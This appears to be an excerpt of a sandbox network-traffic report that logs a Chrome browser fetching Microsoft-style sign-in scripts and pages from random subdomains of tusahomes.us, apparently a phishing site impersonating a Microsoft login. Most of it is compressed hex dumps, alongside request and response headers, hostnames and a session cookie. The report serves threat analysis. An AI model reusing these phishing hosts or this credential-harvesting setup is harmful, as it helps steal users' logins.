                                                                content-encoding: gzip
                                                                2025-04-09 00:19:08 UTC15571INData Raw: 1f 8b 08 00 00 00 00 00 00 ff e4 bd 6b 77 e3 38 ae 28 fa fd fe 0a 47 33 37 6d 77 14 97 e4 57 6c a5 d5 d9 2e 27 a9 f2 74 5e 13 27 d5 bd 4f 2a 93 25 4b b4 a3 8e 23 79 4b 72 1e e3 78 ff f6 03 80 a4 44 c9 72 aa aa f7 59 f7 ae bb ee 3c 2a 16 09 be 40 10 04 40 10 fc f0 f3 d6 ff 55 f9 b9 b2 fb fd ff a9 8c ae fa 97 57 95 f3 e3 ca d5 e7 e1 e5 61 e5 02 be fe b3 72 76 7e 35 1c 1c 7d 7f 3d d8 28 fe ff ea de 8f 2b 13 7f c6 2a f0 77 ec c4 cc ab 84 41 25 8c 2a 7e e0 86 d1 3c 8c 9c 84 c5 95 47 f8 37 f2 9d 59 65 12 85 8f 95 e4 9e 55 e6 51 f8 27 73 93 b8 32 f3 e3 04 0a 8d d9 2c 7c ae 54 a1 ba c8 ab 5c 38 51 f2 5a 19 5e d4 ea 50 3f 83 da fc a9 1f 40 69 37 9c bf c2 ef fb a4 12 84 89 ef b2 8a 13 78 54 db 0c 3e 82 98 55 16 81 c7 a2 ca f3 bd ef de 57 4e 7d 37 0a e3 70 92 54 22
                                                                Data Ascii: kw8(G37mwWl.'t^'O*%K#yKrxDrY<*@@UWarv~5}=(+*wA%*~<G7YeUQ's2,|T\8QZ^P?@i7xT>UWN}7pT"
                                                                2025-04-09 00:19:08 UTC14460INData Raw: c5 1f bd 5e 6d 54 4e 85 a8 8d df eb ca 4e 55 9a 10 6a 68 30 40 98 2a 37 60 a4 e6 81 12 05 09 e1 15 75 21 09 87 a3 73 0e 7c a0 d4 a7 24 57 91 26 94 8c 9c ed 41 3e df 86 5b bf 5d c6 18 51 cf da 4f ea 0c 81 c4 65 9f 04 ed 3d 14 72 0d 60 29 0d b6 be d4 3e 64 af 77 59 29 be d9 da 81 4a 24 60 8f 6f 11 f6 9a 78 00 6b 0e 84 95 54 a9 76 94 da ed 2d 43 77 ea 0c 7d 21 30 44 ce 77 aa 82 a0 91 48 c1 3b 2b 6b fb a0 25 00 07 7e c2 e3 85 6a 4d 48 dd d5 65 c0 63 12 68 ce ec d9 79 8d b5 55 0d 1a c4 dd 00 c6 7b 3e c7 0e c5 80 17 87 b8 8c 1b f9 e3 7c ff 95 fa 33 88 6a 26 d0 02 0a 02 f4 53 22 2d 26 e1 4e 06 55 b5 d0 9c b1 87 2a 57 5e 71 c2 d0 42 f6 38 c7 bb 3d dc 01 c4 2e db 73 80 a7 00 e0 79 36 18 96 55 58 fb 86 c9 69 3f b3 6f f8 d2 8f fb bd 69 d3 d1 04 40 37 ea 85 ca 0f d2
                                                                Data Ascii: ^mTNNUjh0@*7`u!s|$W&A>[]QOe=r`)>dwY)J$`oxkTv-Cw}!0DwH;+k%~jMHechyU{>|3j&S"-&NU*W^qB8=.sy6UXi?oi@7
                                                                2025-04-09 00:19:08 UTC16384INData Raw: b0 31 78 4a 1e cf 30 1b 9c 3b 30 ea 51 29 2b 1a 5e c3 b8 1d 93 a3 3e 69 48 9e 66 54 2a 3d 49 b0 b5 12 79 fe 4e dc 5a e6 46 24 e5 0a 5d 86 57 c0 f6 cb 96 19 ce 25 ca 03 b4 06 87 80 be ec 14 ca bb 84 74 34 5d fc 87 0e 51 59 62 59 60 50 57 a6 86 aa 4e 82 14 1a 36 59 80 61 d2 5c 7b 8e 17 5c 2e 96 e4 a6 35 72 f8 cc 4f cb 12 7f 37 84 34 3c 5d 94 04 3d fd 7a 09 7a d6 35 d4 cc 7c 6d 0c e0 da 00 d6 39 a3 7b 91 e1 9e a3 f0 5d 3c f8 7c 13 03 ed c5 a6 34 ee 50 65 c2 20 0a d8 4e be 8a 91 9c dc c9 38 82 2c 85 2a ad 46 01 b5 19 75 d1 4c 7c 7e be 81 43 f5 be fe 83 fb 08 2d c3 51 26 a0 ac ff 5d 1a a3 6b 9f 14 62 3b fd bb 40 b7 73 2f a7 34 a5 2f 12 22 5a c7 09 ab 1b d9 6c 63 ef 2b 4b f8 94 f0 bc 47 a1 2c 0b 89 75 31 db 9f a9 8c fd c1 d8 2c c2 48 c0 27 8e d2 14 a3 53 d9 7e
                                                                Data Ascii: 1xJ0;0Q)+^>iHfT*=IyNZF$]W%t4]QYbY`PWN6Ya\{\.5rO74<]=zz5|m9{]<|4Pe N8,*FuL|~C-Q&]kb;@s/4/"Zlc+KG,u1,H'S~
                                                                2025-04-09 00:19:08 UTC16384INData Raw: f1 0c dc 9b 7e ad 1c 65 0a f7 eb b4 88 e1 69 5e 16 7b 41 82 71 84 e0 6e 09 1b a8 98 d4 62 7d 3a cd c6 79 7a 17 35 7a 7c 9f 64 0d 9c 86 a6 8b 52 de b7 8d 2d 07 ee 17 fd 76 89 71 5b e2 9d 3e 7a 74 1b b0 7d 1b 8f e9 14 e8 8e a4 81 92 f1 3e 96 83 b4 74 a3 f7 88 84 1c de 41 41 23 63 75 f0 04 b5 34 51 d2 87 1c 69 e3 d7 2c 4d 56 9a bf 66 6e 03 a5 ed 68 b8 c4 31 87 27 e9 5d 43 d3 e1 62 36 d2 de ca fc 45 f4 51 ad ab 76 b1 9f 5c 64 38 4e b5 f9 30 74 23 18 29 13 bd 6a 1c 1c ee e0 2e 23 ac 8e 94 02 6a f6 47 d3 30 3a 8c a3 51 88 04 30 2a d8 7e ec a3 74 01 c9 a6 ca 6d 85 3a 45 b4 aa 44 f5 21 53 51 89 03 f3 0e 54 13 c7 49 52 9b 19 43 5b e8 eb 29 eb 64 b0 9e e4 db 90 3e 3e 46 d5 5d 7a 99 5d a1 85 5e 68 64 1f 75 46 90 3d b8 0c 2f 47 1c dc e6 ca a7 9f f7 c1 68 1a cd e4 05
                                                                Data Ascii: ~ei^{Aqnb}:yz5z|dR-vq[>zt}>tAA#cu4Qi,MVfnh1']Cb6EQv\d8N0t#)j.#jG0:Q0*~tm:ED!SQTIRC[)d>>F]z]^hduF=/Gh
                                                                2025-04-09 00:19:08 UTC16384INData Raw: 4a 22 72 30 bb 6b 44 a3 ff 49 0b af cf ed 49 a4 73 54 f0 ef df 23 c8 de c4 22 04 5a 3b 90 f5 47 ae 5d ff 8c eb 9c 87 05 62 30 e4 22 42 15 54 b9 4f dd 8c 47 f5 c2 fe 77 df 97 5c c1 ce c1 9b ad 45 99 55 41 ca 0b d3 b8 09 75 b4 ba 96 df 7d 3f b4 b9 22 1a f0 92 23 0d db 4d a9 d6 1f ae 44 e1 bb 68 a8 ce 7a 17 c6 35 4b 8e dd c2 b2 34 42 af aa 32 89 c4 7c f0 9e cb 71 0c a1 f0 7c d4 58 62 17 b4 c4 7c 35 fb 6a d9 5c 4b d6 6b b1 bb c6 bc 06 aa 15 62 eb a0 b2 a5 a5 75 ad 36 85 62 32 70 23 91 5d 52 01 8d b5 f8 5c 46 75 b6 16 a5 06 ee b4 8d df 1d 87 aa 82 cc ee eb 9d ef 5c 66 67 f2 c2 99 b3 de 5b 5f 6f 58 cf f3 c9 d0 78 6a c0 7b 78 e9 b5 0a 04 d2 6a 68 96 cf bf 64 66 1c d6 bd 13 a0 69 45 c2 70 d6 a6 96 95 f6 b5 6d c1 ea 54 c3 72 72 91 b0 4b 3d 99 8a 9c f5 67 d5 68 aa
                                                                Data Ascii: J"r0kDIIsT#"Z;G]b0"BTOGw\EUAu}?"#MDhz5K4B2|q|Xb|5j\Kkbu6b2p#]R\Fu\fg[_oXxj{xjhdfiEpmTrrK=gh
                                                                2025-04-09 00:19:08 UTC16384INData Raw: 3b 06 7d dc d7 7a e5 0c a6 2a c9 30 e5 a5 df 5a 53 ef b0 3d 91 f7 df 10 09 ce e4 f0 89 d4 7a ca 71 0d 39 5e af b6 e5 97 7d 1b ee 95 53 2b 6a b0 91 39 34 1f 3f ab bb 28 17 27 8b 5a cf 88 4e 3a 30 1d b2 d1 f1 67 85 79 cc c7 0a 6c d3 8c 0a 75 a3 20 13 b4 bd 58 a8 5b 5e 8c 9e a7 74 b9 be 23 75 fa 34 de ba 82 46 47 fe d4 ad b5 eb 31 03 4a 35 bb ea e2 c0 43 e2 46 fd 04 bd ae f8 5c f5 1e 60 d6 27 2f 37 5b 00 14 6b a7 5b 95 88 d4 07 47 ef f7 65 2a ba 56 de 77 25 f0 e0 53 e9 22 e8 fe e8 8b 4f dc 0c d2 d7 0d 9d 0d c5 8b b5 d6 d4 91 d8 9b f3 fe 75 5f 1b 54 da 7c 76 ff 1d e9 6d 1b 6b d3 8d 48 e9 c9 75 3b ea 09 66 e9 d4 ea 2f d0 24 39 ec 2e 5f 73 8e f5 53 cb b7 ca f0 d7 5e be 1b 4f 45 bf f3 71 74 f4 c5 26 e3 aa 39 43 4d 77 8d 29 3c fc 34 a6 ae ce 31 b7 06 fb 09 24 ea
                                                                Data Ascii: ;}z*0ZS=zq9^}S+j94?('ZN:0gylu X[^t#u4FG1J5CF\`'/7[k[Ge*Vw%S"Ou_T|vmkHu;f/$9._sS^OEqt&9CMw)<41$
                                                                2025-04-09 00:19:08 UTC16384INData Raw: 43 5a 06 db 7d 79 c4 b7 1c 3d a1 88 51 4d b6 0a c0 e1 a0 f5 6d 31 70 3e 3c 79 74 54 39 3a 94 a9 3a 97 47 4d df 0f 2f a1 14 ce 4c 4e 20 47 81 70 34 5b 85 1c 3d 52 11 8d b7 71 a6 37 ab bb 36 ed d7 b1 15 7d 9c 6d b8 24 42 ae 16 04 c0 cb 39 83 8a 42 1f 29 a8 6d e4 ac 63 5e cf c6 d1 e6 fc cf 26 33 30 8d 6d dc 60 5d 05 ed 86 2b b6 dc f6 3d 18 62 1d f8 c7 c3 25 39 19 20 ea 96 7f de ce c5 cf ab 99 b1 81 bb 5b 87 16 1b c5 b8 3f a2 cb f9 ef 93 67 3f b6 4e c1 6d 07 c7 92 56 bf d0 1e ad 0b 83 16 f3 dc 58 27 c5 48 67 ce 87 f5 75 a0 90 cb 9e dd bb e7 c6 38 bd 1e 17 86 37 5b 0a 0d 2f 4d cd 40 63 a3 ce 1e bd 31 0e 03 2b 58 cb 26 b5 4e df b7 28 c1 04 e4 75 dd 36 1b 08 b3 da 7a 54 ce 8d 6a 22 bb 3b f8 0f a6 d3 e1 e0 d5 e0 9e 18 6f 04 1c de 1b bc 56 99 cd 64 77 17 5f 8c 57
                                                                Data Ascii: CZ}y=QMm1p><ytT9::GM/LN Gp4[=Rq76}m$B9B)mc^&30m`]+=b%9 [?g?NmVX'Hgu87[/M@c1+X&N(u6zTj";oVdw_W
                                                                2025-04-09 00:19:08 UTC11927INData Raw: b4 bc b8 74 35 ff 44 41 80 2d a6 2c ed 8e 96 b0 e0 27 89 6e 8e ae 42 f4 d5 c7 dd 7c c9 46 be 48 a8 58 33 58 c2 43 a2 2a 6e 2a 66 c2 06 85 10 d6 ad 8d 08 22 f8 d1 0a 23 b5 27 30 62 fc ef 89 78 88 81 4d ce 17 86 5a dc 74 54 86 15 43 2c 3e 92 c4 52 00 fd 08 a1 15 bf 3a c9 e5 0f e9 d4 3d 02 f5 ad 2b c1 94 a6 ee 31 42 29 7e 05 61 14 ff fc 10 8a f7 95 2d 57 29 ff 55 c7 34 29 de 9b 64 08 64 f1 ff 23 8a 46 b0 43 e2 2e 70 13 c9 0d 43 ef de a1 88 43 6b 49 3c 0b 7c 0a b2 16 e7 b3 6c 1f 9d c3 4e e8 ee ce fc 42 1a 19 cd e5 11 11 b1 cc 21 c1 44 ec 2b ea 60 27 f2 48 9c f5 62 3e 7b 74 ad e4 21 38 d7 47 a4 b9 27 ca 1f 23 5c 4b 25 7d a1 11 14 17 e9 06 82 d4 14 b6 f5 87 c6 9f a9 ec c4 23 49 e1 f7 47 d3 7d 04 49 16 d7 4d 0a 90 0f 12 27 57 91 db ca 76 fb 07 0b 95 2b 83 ac 3a
                                                                Data Ascii: t5DA-,'nB|FHX3XC*n*f"#'0bxMZtTC,>R:=+1B)~a-W)U4)dd#FC.pCCkI<|lNB!D+`'Hb>{t!8G'#\K%}#IG}IM'Wv+:


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.549749137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:05 UTC711OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_cwzkvppibgumnhupu2wjoa2.js HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:07 UTC812INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:07 GMT
                                                                Content-Type: application/x-javascript
                                                                Content-Length: 16613
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Mon, 24 Mar 2025 21:51:45 GMT
                                                                etag: 0x8DD6B1E1207E927
                                                                x-ms-request-id: f9601d52-301e-0057-499c-a71ada000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001907Z-1686b48456f6tqmjhC1SJCnnpg0000000cw000000000370y
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:07 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 00 ff dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 66 b8 ea 81 f0 c1 4f 8c a0 31 08 80 33 d8 21 01 08 00 87 52 48 32 a2 09 14 c8 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd 5d 95 55 95 95 95 95 99 95 99 f5 87 f9 da 9f c6 5e e0 bf 14 7b 8f ea 77 21 78 e9 ef 3d 7a f3 97 de 8f fe cf 7b a1 88 d7 a1 5f c0 df 25 f1 69 15 84 71 f4 fa a3 1b 16 c2 06 be 6a 3c ca 77 f5 c7 cf 8e 37 ab fb ce 22 70 67 62 56 ff 43 e5 f3 6b 59 55 60 d5 a9 bb 58 bc 0c 15 04 27 74 92 df c1 1e 3c 70 b5 c6 1f ca c9 87 cf d8 8c d7 78 d4 80 82 d2 b2 21 9c a0 34 6d 78 f0 ef aa 51 2c 3a c1 cb f2 de e7 97 3f 26 c3 70 02 c7 83 ce bf ac ec 51 2f fd 86 f7 b2 0a f0 e1 cf fe 9e 13 c3 9f
                                                                Data Ascii: }Ms#fO13!RH2~Qx7}'}?e#QU]Vo]U^{w!x=z{_%iqj<w7"pgbVCkYU`X't<px!4mxQ,:?&pQ/
                                                                2025-04-09 00:19:07 UTC1041INData Raw: d7 a7 a7 aa fe 88 29 ac 60 f8 f2 23 3d 11 06 38 1b 59 77 a6 a1 9d c9 fc 61 88 3e 42 00 3d 54 95 d3 38 19 1a e6 41 bd 96 b0 21 2a 40 c0 80 ce 28 ad da e3 d8 bd 06 12 27 0d 18 c9 b6 13 4d 5d 8c 8b 39 72 46 2b 17 f1 81 f1 0f 37 e2 72 85 61 26 f8 ab 8d db 44 6d 9f 70 51 3b 70 de 05 4b 8a 48 6e c2 7a bf c7 52 c7 fc 93 8a ed 97 31 70 0c 9a 3a 17 f3 b8 7e 52 71 ce 0e 29 40 ed ad 8b 27 81 b3 53 20 e5 43 1d 6d de 9f 0f 82 28 62 96 d6 78 b4 96 0e 09 27 d3 95 5b 74 38 08 83 d6 01 bf a4 e7 a2 73 41 89 5f 51 1c a3 82 13 4e 04 3b b9 85 17 44 80 97 ab 9b d0 9d 89 0b ef 86 b7 8e cb ef 11 8f 4a 8a 29 3b 17 c1 9f 5d 0c 3c a2 7d d5 0c 06 90 39 1a 3e b8 21 0a f7 8d 47 c9 82 b0 ca f2 13 6e ab cb 4f ec 58 8a 24 04 b8 47 c5 0e 0f 9d d1 23 b4 a6 9e 9a be 4e f4 0f ac 07 aa bc 15
                                                                Data Ascii: )`#=8Ywa>B=T8A!*@('M]9rF+7ra&DmpQ;pKHnzR1p:~Rq)@'S Cm(bx'[t8sA_QN;DJ);]<}9>!GnOX$G#N


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.549750137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:05 UTC783OUTGET /Me.htm?v=3 HTTP/1.1
                                                                Host: 8f0da58963954c5ebda6645ba9a83b28.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Purpose: prefetch
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:07 UTC490INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:07 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 3692
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cache-control: max-age=315360000
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-ms-route-info: C503_BL2
                                                                x-ms-request-id: f76df1d2-4b33-417a-8ca5-f9ebac876994
                                                                ppserver: PPV: 30 H: BL02EPF0001D6F4 V: 0
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *
                                                                2025-04-09 00:19:07 UTC3692INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 65 29 74 5b 73 5d 3d 65 5b 73 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 69 66 28 73 5b 6e 5d 29 72 65 74 75 72 6e 20 73 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 73 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 6e 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 65 29 2c 69 2e 6c 6f 61 64 65 64 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 6d 3d 74
                                                                Data Ascii: <script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.549751137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:09 UTC674OUTGET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:12 UTC812INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:11 GMT
                                                                Content-Type: application/x-javascript
                                                                Content-Length: 61226
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Thu, 25 May 2023 17:22:47 GMT
                                                                etag: 0x8DB5D44A8CEE4F4
                                                                x-ms-request-id: 967ac517-c01e-0058-1ed6-a524a4000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001911Z-1686b48456f4pvqvhC1SJCxp280000000cc00000000053nf
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:12 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 00 ff cc bd 79 7b db b6 b2 38 fc ff fd 14 32 9f 5e 1f f2 18 51 24 3b 49 13 29 ac af 63 2b 89 1a 6f f5 d2 b4 c7 f1 f1 43 49 b0 c5 44 22 55 92 b2 e3 63 eb bb ff 66 06 0b 01 2e b2 dd f6 be f7 7d da 58 24 38 d8 07 83 c1 60 16 f7 26 8c 46 f1 4d 33 e3 13 3e e5 59 72 7b 71 c3 07 b3 60 f8 ed e7 34 8e 66 fe d2 af f7 f7 67 e7 5e 73 36 4f c7 ee d9 d9 fa 39 3b 63 8c 5d ce a3 61 16 c6 91 cb 59 c6 22 ef ce 99 a7 bc 91 66 49 38 cc 9c 6e d4 4c dc cc 63 51 73 e4 66 cc f9 35 98 cc f9 27 a8 c0 61 ae ce e6 dd 25 3c 9b 27 51 23 69 f2 85 a7 61 7b d7 3c ca 76 83 8c 47 c3 db 1a f0 a0 08 7e c8 93 34 4c 31 0b af c9 32 30 b2 9c 24 c1 90 ef f2 6b 3e a9 01 1e 19 c0 5b b3 59 3f 4a c3 ab 71 96 6e c7 49 75 f1 a1 d5 a2 77 41 ca 6b 41 cd a2 2f 7a df a1 c9 23 3e ea
                                                                Data Ascii: y{82^Q$;I)c+oCID"Ucf.}X$8`&FM3>Yr{q`4fg^s6O9;c]aY"fI8nLcQsf5'a%<'Q#ia{<vG~4L120$k>[Y?JqnIuwAkA/z#>
                                                                2025-04-09 00:19:12 UTC16379INData Raw: 0e b6 c0 e9 e2 7a 6c c3 9e 06 cb 84 a8 18 f4 2e 41 8b ca 7c 1d 8e 61 65 36 50 04 8f 7d 17 ab 45 fc fc f5 25 ca 44 57 69 0b ea cc e5 82 0d 46 23 7d b8 ee eb 18 67 f6 fa 25 97 6d 74 24 d7 32 7b 42 99 9a bc a8 f4 80 63 8b 5a 4a 9e d2 d0 ca 3c 3b 8a 5a 5e c1 98 dd b2 1e db a7 6a 56 50 22 94 17 85 ba 9e b9 28 29 f5 dc db e2 6d 94 18 45 5d 2c 6e ae e4 f4 48 17 a1 8b 27 4a d3 57 e4 65 cc 8d 48 58 87 5c 38 33 c8 25 41 1e da 3f 5d 67 78 95 90 ce 60 07 58 5d b5 df a1 5d 6c 68 aa c4 43 fe a1 7d b1 79 5b 3b 3c 42 8b 4c 88 5e 04 97 7c 53 41 2e 95 7d 26 b5 4d 68 ab 33 39 0b 0c 0d d3 f2 c6 b2 d0 ff 01 b5 50 70 07 94 8c 81 88 fc d3 fb 9e 6d 5f 5e e1 b5 99 be c7 30 a3 2e 55 79 db 26 47 db 91 10 d6 60 41 c0 7d 92 4b 66 cd f2 23 00 69 23 67 a6 bf a1 60 e1 8e 81 92 64 ee 0d
                                                                Data Ascii: zl.A|ae6P}E%DWiF#}g%mt$2{BcZJ<;Z^jVP"()mE],nH'JWeHX\83%A?]gx`X]]lhC}y[;<BL^|SA.}&Mh39Ppm_^0.Uy&G`A}Kf#i#g`d
                                                                2025-04-09 00:19:12 UTC13553INData Raw: 52 90 32 30 3f 41 2c 25 39 aa aa b0 8c ad c3 93 c0 f9 4a c8 28 c2 e8 ad fc b7 b3 ce 82 ca c1 cd ba f3 df fe 8a 54 6f 94 e9 f2 8d 73 a0 5a 2a 92 99 d9 45 69 4e fb c8 15 b2 28 3a 17 86 79 3d 18 cd c5 ba 25 37 ad 0a ec 87 f4 d9 30 f8 82 cf d5 79 7c 44 1d 84 85 0b eb 3b 0f fe e3 4d 51 a5 21 55 63 ff bf 70 fc e4 3a a3 88 ae 38 47 71 55 29 41 e1 f0 5e 87 ae ab 48 30 36 8a a0 8f 55 b9 89 a2 49 38 c6 19 b1 78 fb 8b 22 b1 0f 0b dd 1d 33 33 40 42 0c db 7c 4f c0 28 e6 7a 08 96 01 95 5d ed bb d4 15 db ec c7 f1 16 6d 6f 68 90 c6 f2 9e eb 33 2a c7 18 89 31 56 eb 59 ec bb 71 89 7f aa 93 e3 73 04 52 29 6d 4a 14 bb 22 63 6f 55 2c 47 e7 05 5d 5b 13 bf a6 ac 26 93 2d 98 72 a5 b7 e5 5a dc 5a c8 41 d4 fd e4 3e 1d 91 da 8f 3c 15 aa a8 02 27 5f eb 0a 69 e7 9e 8a 73 ab 65 64 09
                                                                Data Ascii: R20?A,%9J(TosZ*EiN(:y=%70y|D;MQ!Ucp:8GqU)A^H06UI8x"33@B|O(z]moh3*1VYqsR)mJ"coU,G][&-rZZA><'_ised
                                                                2025-04-09 00:19:12 UTC2831INData Raw: 8e 10 a8 9f c1 be 34 b3 09 1d 70 38 e4 31 87 e1 f3 93 b9 7b 05 75 90 11 fd 6b 08 aa 97 0d bf dc 2b ff d8 eb 8e 1a 1c 27 17 2f fe 1d 5c 0a e9 89 7f 20 84 95 93 94 dc 72 22 8a 62 0e 6f 2f 8e 7b c1 81 0f 13 34 f7 9a be 9c 70 48 1e a5 9a 1b 28 4d c0 83 92 45 9a 83 bb 75 e0 29 09 e7 75 e7 94 46 77 1a 9c ea 15 90 20 05 c1 97 ef fc 03 9a 5d 0e 34 4c db e7 94 b7 cf 5c a8 c3 ab 5b ed 44 c6 18 af 88 90 25 7d a8 98 0f 13 e0 15 39 90 0d 19 93 fc f5 38 ed b7 1d ba a8 88 54 a5 73 76 2f 02 93 e6 44 46 22 36 68 34 44 51 e1 33 0d 81 c7 f1 d6 07 84 89 f8 31 99 de 32 66 90 b7 e9 1a 04 d1 b7 9f 14 ed c8 07 74 11 68 6e 9b f6 7b 7e fa 98 10 9a 45 0f af a3 90 f0 9d 36 61 ea 74 c5 9d d1 84 b4 43 7e fc 18 85 39 a5 c7 ca 24 81 92 16 46 63 d9 d4 d2 ae c8 e0 15 a9 a1 7a 5d 67 57 3b
                                                                Data Ascii: 4p81{uk+'/\ r"bo/{4pH(MEu)uFw ]4L\[D%}98Tsv/DF"6h4DQ312fthn{~E6atC~9$Fcz]gW;
